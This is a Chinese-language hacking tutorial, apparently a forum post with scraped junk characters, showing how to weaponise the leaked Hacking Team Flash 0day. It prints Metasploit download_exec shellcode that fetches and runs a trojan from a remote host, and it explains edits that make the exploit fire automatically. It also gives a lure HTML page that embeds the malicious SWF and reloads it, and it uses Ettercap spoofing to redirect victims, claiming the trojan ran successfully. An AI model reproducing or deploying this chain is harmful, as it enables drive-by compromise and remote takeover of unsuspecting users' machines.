|
3 I# k! ~- X! W
三、flash 0day之手工代码修改制作下载者实例入侵演示
1 s8 d. ]; j3 I8 P: _2 A0 V/ k. s
( Q( @, m( I3 o: G# A( ]% ] v, G+ F8 s
利用到的工具:
" ^1 y) F/ K- m1 B
5 g8 i' j* a! A* C3 ?
: j; X2 v! r% n$ v" W. C- ? Msf . N9 k% r1 y/ B) }
- p' c8 E+ U, q B
% t6 \0 |, |& n+ Q6 W9 Z6 J Ettercap # q' Q" _5 _/ u/ O) i+ w
8 z( F# j, C$ z
! Z, k( p( m8 g) M1 M( [& Y' } Adobe Flash CS6 & v! r' I, P5 O
. x6 B1 n* ~3 @! U+ w# y! y
- `% T2 Z. m' f; P" g+ u Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
. e7 X( B8 D8 [ u! y
" O# H8 L3 i/ X8 T( o3 l- r S7 R4 c4 M2 J2 C: n$ @7 R
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options + Y1 H& J% e" b" @" b
- L8 y2 s2 @9 Z
! }/ I& ~1 w6 V1 I! C6 O
如图: ' k+ s2 S6 a! i1 c8 l) `' F l8 `
; k/ b6 t$ I! Q W* h% k
# u- K9 B0 Y5 a3 _" z
/ H0 W5 @" _8 f( `9 g) _ 2 p5 s; O" v2 d" e3 ^! |8 c7 `
. I! [. T/ H& E; ]1 J , h' {( s: @2 Y8 ^9 f: F8 @
* h- [' j( K# E& D) O; f
n( N1 Z& m! H; m9 G 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
' Z& k4 R# |: i8 v 7 B" U( y$ o/ k3 S6 D$ t+ P3 V) Y
' H& Q R, U6 W& ~. p
: y. Q, F7 C' l/ [4 g- \) i8 u, n& k 6 r) W7 L K, e1 b
/ t- ^. a4 r% s6 s
" g) O5 i; k' n2 W4 i 5 w. @( e' t7 | M. H" p/ S# C5 m
- j5 ?4 E. J/ A6 R
然后执行generate -t dword生成shellcode,如下: ) G8 K$ e% o0 s; \: n5 d
9 E' o1 e9 O/ c5 t* O A" y
0 W* Q$ v/ B6 ]/ C
" O: Y" q6 o6 t O# ?0 M C% P$ b6 h
O! Z1 A X! ^
4 y; G7 z3 Z4 T
复制代码到文本下便于我们一会编辑flash exp,如下: # t4 a: t! E$ ~
9 Y: y7 P# p( B# ~: b! y
6 ?' K# @! k. ]* _4 S5 i2 S
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
1 V+ e9 D3 U3 }3 S7 u ( d5 W7 g& K) i! ^ \/ @
: l6 |& Q( T0 q, R/ M 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + I. I$ R1 H% V) [
/ A, Z& ` c8 X9 E- ]8 R; H! Q0 K5 _9 I- }, Z. s& N# g
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
/ B4 @0 d$ [, D6 i+ b % F8 E; {4 ]2 F# z. `. ^) i5 Q2 ]
1 r) @# Q; a5 g! e; w; {6 ~
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
) T8 q7 g# S7 i9 k, C
8 _9 g4 N. b l% {% m4 L0 `* J4 |3 p! t; b+ S/ t' [' }
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, # z3 Q6 x4 D& X1 b! H# x
' h$ X' o; t8 A" W8 c
0 M8 b: R& v! U+ A: w" S 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 8 \7 Z/ G3 e2 Z$ A9 ?$ V" `5 R
( ~6 E1 F" n! Y2 R& I7 N4 O2 ]+ y# Y; a! y3 D; D
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 6 z t9 ^4 V# |0 e* ^# X& s+ }2 l
- t. T! s( T+ v, ~& i2 U
?) v0 R5 q8 v7 s 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, & B; y( X9 e2 A7 a
/ T5 ^7 p7 ~. U( e7 W$ p6 w% C9 ^" Z4 U" ?
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
- q( C+ U4 V& K* [
/ f1 y$ z/ U% T$ d4 o* N* S1 w- i9 D7 e- y9 y0 | q
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / P6 p0 ^, L' N" M
8 F- Z! g- v% c. @! C) ]" _; }
9 f; \# U$ ] @9 O0 @ {6 D 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 7 c8 M2 Y: B7 U2 C. i% T& ^* V
4 e+ |# f# S5 b4 Q7 W+ C H% D2 o/ h' p% \
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 1 D( K, Q/ y. u* @9 k
$ A9 |3 R% J. k8 s5 t- i9 `& l( y2 J7 J) `' n9 K8 B1 l& g! m8 F
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 1 T4 a1 c. Z* U( s5 w9 w/ G2 g
4 c- w, X7 w L0 v
: M0 ^. \. Y/ l! _1 U) v5 N x5 b
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
% a* {3 ~6 a6 u9 G
- i5 u! C# _" i. H4 g. L9 z
9 E: |" r9 y! e! u5 _! R) h' p 3 ~9 |$ U: j5 W: P B) J: l
7 f* R" b+ b) C+ y8 r
* i4 v) N) G2 U$ _" p# Z5 M! S5 ^, i: _ , O) l7 D1 q! E. o8 B' T- _+ x5 k
- I, [) R* c2 e- F) G' e2 ?% ]" ~+ n% r# Q8 b+ R O
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
7 {9 p4 D6 x! |, J5 B" n
) Q+ G+ H% L: M
3 }" K4 T) ]7 v# a S& p) C) r2 c* B6 d
& R0 w i: n5 M2 ~2 ^' E+ Z+ |. k8 f! K
/ H1 W7 Y( D. ?8 j, J/ P$ E2 D# o% b3 `% w. ~/ D
先修改ShellWin32.as,部分源代码如图:
/ J# l+ O$ l$ i* n& z / d% r2 W3 _4 m) z# M0 Y- p
" j2 \8 M, u, l- U+ _
0 s7 x; i( ^" M% [6 ?' K& k
3 U) b0 A" }# J# k& O w
3 c8 l& {" K) P. F 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: : x7 {, `1 m* @; u1 r$ U
# v; ^" m/ a+ z q% s) l* ]0 U0 u5 Z/ u$ m6 \* B/ n
7 E: C5 w7 N# a$ z- E M
% j+ _7 \0 k8 f
$ ~! k* O' H+ k: d8 [% f 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
" t! `5 i: u# I4 B, P
- E) }) q# C: i/ d& V, {& }/ L. _ D# x" t; B
) o% T' W# S3 t& Y7 M + A7 k4 j( s' k* \. G5 }
' h+ @9 `2 d- ~6 o! ~ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 2 o. p9 a6 G2 U( ^
8 e! O7 W) _4 K! y6 z
3 C; z2 j3 o: u& K' G l 6 o7 b- m- o+ N, s1 h% N
, \4 g% K! {4 @' w) c
, ^( @/ ~. R. _& S' ` ( c$ K; P0 I( L0 j; y
( ?( \ Q- V. G4 R) n7 k* p' c
3 B M: `4 q f) p4 l d* B, r . _% W1 J/ i* r* [$ q9 _+ {
; y8 d2 I$ N$ h8 M/ _& R: S7 b2 h' ~( v
然后点保存,下面我们来编译一下,打开 % e: T) e" W, ^% ~! _2 L2 Z# {
; ?# F3 }" P( T2 g& q+ @6 c L
9 y7 k b9 p9 S: o( x
exp1.fla然后点文件-发布,看看编译没错误 $ x _! q# D6 z
7 K$ `1 b/ Y& I2 V1 T
; i" j, \9 B: W& N4 }) a . Y' [3 E. }8 m$ t* K0 O' r
- h) n) ^- b* ^/ Q; Y6 Q2 r$ J1 F0 j
: n) i2 R- ]2 f* U5 S: u' n8 A0 l
* m& Z, `" k, n" \; }( ]7 a) C5 F* b 9 C3 H$ |1 Y" \
9 i3 M" X% c& \) { q- b, w
% b; a, ^1 j9 |6 Q: Q
3 A' o8 H+ G9 ~- [/ Q; r& K
, C2 u% g. U* E0 m / R/ o7 \) `3 [2 v
+ C9 b' ~# j5 J# B5 d% r; A$ c
% l! [" p" Q7 M$ P 然后我们把生成的 4 |( g: s b. @7 F
& X/ z3 X$ \" O
, | Y k$ s3 [# R
exp1.swf丢到kailinux 的/var/www/html下:
0 E+ u9 J; m' q. A P y- {& M7 @ i* @
* l6 X+ a; }: q& A) n; `( P& \& t
然后把这段代码好好编辑一下
/ w+ f2 {& w# `5 G4 ~! e3 _ }) P2 m' i* a r9 p' i
4 M: w u0 F9 A# D8 k4 @! U
6 o) P+ v4 L& m1 @6 k. N" L& s
A5 N, z0 } ]
( [$ {. }; V. V4 ^" ]8 |
9 O' l: B) q- @; Q2 C# P ' p: l" C Y, E0 o% f" P: O
! |; u c/ X6 b0 X! B 4 z& w/ p2 a) h
8 }7 O1 J, J( T6 \! y
( x0 O, Z9 w' m" F% J
4 g4 L+ c/ K. [2 C& a
% x4 K8 c- N8 j. m' G! Y" k0 h# u+ v3 V1 a5 Y9 b) d
/ i: D: m* I% F% ~6 F/ H9 p # f; [& F: U6 U% J; h
: e* m) f7 I" K* {' ^( x
9 x% ?0 h8 ]/ |6 o- }1 P6 T
5 X2 D4 g7 Q6 R; X* f- N7 j* M+ P" P% {
<!DOCTYPE html>
. q$ ~7 N& m5 j8 l) C2 L1 b/ P
0 Y' i2 _! i6 L0 U: d8 D& y2 {% i; T4 c7 v9 ?
<html>
" |; V4 S2 C; d; l# x ! P7 B5 b( q. y4 \
# }; b; v! W$ y k1 m
<head> . d) w; _; M. T1 G/ R) T" W# @
' s$ y# X# n8 ? ?7 q$ S
% h% C* s- Z ?, i) ?! z# K& g <meta http-equiv="Content-Type" content="text/html; # T' R% S- e0 B. g4 y1 F
! f/ P- J5 m+ U: D$ g2 D9 C! V- Z" p. r, X% ` M
charset=utf-8"/>
, r& K8 S1 B% p: t- A% s
: _9 M* ~! R4 K" I* Z5 f5 @
+ I# l0 r: v7 Q, x) I I5 O </head> 7 P5 G, [) ]& T! H
' Y8 W# P+ G8 ^' B% X6 y8 f& {2 J. U5 |
<body>
: c+ ]1 i$ e4 |4 H3 c
& K8 w- L3 Q+ Y7 t/ E0 z& E. }) R. s/ X. a$ a1 o7 i
<h2> Please wait, the requested page is loading...</h2> s( v# u% J* x- I6 o
0 S+ E8 r6 S# r
: a% q' V3 j5 U
<br>
" \& K1 `5 j2 }! Y: C( O7 F
# n( m8 D' D4 S0 F; p) B/ X( n% P+ P
, w3 t+ ^8 I7 D6 ~ <OBJECT
) u E9 B/ y x4 l# Y 2 E) s4 M0 `3 ~6 f, [. A
~/ j* l/ V" R; |5 y$ w classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
/ K) F) _" T/ p d- o( m 0 W7 X' A* U7 S6 S: @. c
; a D# J% ?7 E4 U. s VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( @0 [+ `$ n# X
. ~ P" z) C8 H( |( I) a# r5 U7 V* u. D
</body> + \+ `8 T, t4 Z2 L8 F, L( I
+ v+ c D+ T& C) P: S: }# J( D$ Z; i! a' g
<script> 2 c- n( Y/ L' @% N$ J6 ]
# a3 I0 v4 j* |0 U
' ?6 ^& f) G H' `9 G5 b$ C P
setTimeout(function () {
B/ L8 q8 N- }+ `
( x: d( [1 K \% e4 |3 Q9 X: r. ]1 v' l" J
7 K! y! n$ H$ o* V7 S; v8 ?/ o $ B3 O: K9 a7 Y: x6 A
' J& D8 r+ f& \ window.location.reload();
% U& g% {2 u* o; d* `
' L8 Y1 \& [! T4 k/ D# Q" Y T5 X" l3 @. ]) j: J1 D7 ~! m. [
}, 10000);
7 T( s( b: P" ~, U% f) K
( ^/ g7 [5 Y( ^: h
$ O \* u8 h' a. F0 |0 t; O" _ z4 p
, U( O+ E" e! u" U/ X& g/ ?2 I1 G4 ~) H
, r1 g) H9 Z( p9 p* }8 B" R+ r. A$ K: m. l
</script>
1 f# z i( c# _# X8 D f' m9 ^
, x; z) g$ t- @/ @" w( w
0 A F5 X9 N8 x% X </html>
$ V6 h% ?5 y0 V' U0 n1 a ' a0 U2 n" ` G
. l. p7 e, m# n0 a& C7 s" L( | 4 X1 ]) T' @1 d' P- r. x
$ ?$ ?3 M2 @ v1 E# y* t8 b
$ }: f# a* p5 E b1 a
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ' ]9 S1 m! E* z9 B8 v) j5 H, x
: W1 ]0 `/ d# n
3 c( k7 F( ?0 `# e9 X5 u* Q
6 R3 y1 z7 \7 a$ T8 v7 Y' W
+ ]9 {/ X/ A/ V2 Y6 a( n+ |0 `
7 e. Y: Y" ]. ^: e( o) e: w: o/ n
! S8 |2 |% F+ a. p: N9 { * B: `8 a9 a1 N2 Y4 I' b2 {
5 A5 ^5 |+ A& Z; Y7 I+ C 3 r/ ?+ \% h4 M7 R2 ~2 A5 R0 [' q2 f: T
' w+ ?+ A. F5 `
- [* R% q( e3 j
' H4 a" x B7 }
) g# j- Q* o/ [
1 n+ |7 \% ]( |: N$ x9 S
% w. T- R0 I9 s7 J+ T
3 I- }# x7 ~4 }6 K |
# ~) `9 C" ?( r5 ^0 ` 下面我们用ettercap欺骗如图:
0 Q# I# D! o9 @ x & G9 l2 I, C e) J& ~
/ F2 e" u! d1 U" z1 T2 N) l9 q
8 V& V+ i6 t9 u% [- {: k / G. r3 F/ J. n% g9 J
% G" S$ x. y; I0 p! T& K
* w, y5 c I6 R8 e+ Q/ f
7 `2 k9 d, r9 v+ o& M1 k
- ]/ [ Q% C* S0 m+ }9 t 下面我们随便访问个网站看看:
% p' ?1 P; h8 H: [ f2 i* ` # U# Q' @8 n6 w B1 B
6 z& y% ?; j# ~8 E# x' ]( w# g- M
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: - g; r% A w1 }( {
6 a I+ _ p/ E: E3 H9 y9 ?
' a3 L1 ~# J+ P/ e ; [) T3 ^0 E7 ~$ \( R
9 G; f2 B% c) M( D4 f! y V" |
2 M7 m n: B% D9 m- m3 p8 ]4 i 我们看另一台,
3 p3 `* P3 {8 S
! {& r+ S5 p! T- }0 f6 L' p8 D S* p c, O! B
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 . D7 }* k; D4 u. L' q* r
|